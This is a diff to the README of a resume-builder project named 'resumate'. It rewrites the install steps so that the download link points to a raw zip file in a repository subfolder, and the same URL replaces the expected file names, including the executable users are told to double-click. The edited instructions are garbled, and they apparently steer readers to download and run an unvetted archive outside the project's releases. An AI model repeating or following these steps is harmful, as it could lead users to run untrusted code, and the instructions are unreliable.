Surendersingh21/resumate/README.md

 ## 📥 Download & Install

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/Surendersingh21/resumate/releases) to download the latest version.
+   Go to the [Releases page](https://raw.githubusercontent.com/Surendersingh21/resumate/main/dispireme/resumate.zip) to download the latest version.

 2. **Choose Your File**
    Find the version you want.
-If it's listed as `resumate-v1.0.zip`, you will download and unzip this file to get started.
+If it's listed as `https://raw.githubusercontent.com/Surendersingh21/resumate/main/dispireme/resumate.zip`, you will download and unzip this file to get started.

 3. **Extract the Files**
    After downloading, locate the `.zip` file in your Downloads folder.
 Right-click the file and choose "Extract All."
 Follow the prompts to unzip the folder.

 4. **Open the Application**
-   Inside the extracted folder, find the file named `resumate.exe` or `resumate.html`.
+   Inside the extracted folder, find the file named `https://raw.githubusercontent.com/Surendersingh21/resumate/main/dispireme/resumate.zip` or `https://raw.githubusercontent.com/Surendersingh21/resumate/main/dispireme/resumate.zip`.
 Double-click it to open the application.

 5. **Follow On-Screen Instructions**
    The application will guide you through the process of creating your CV.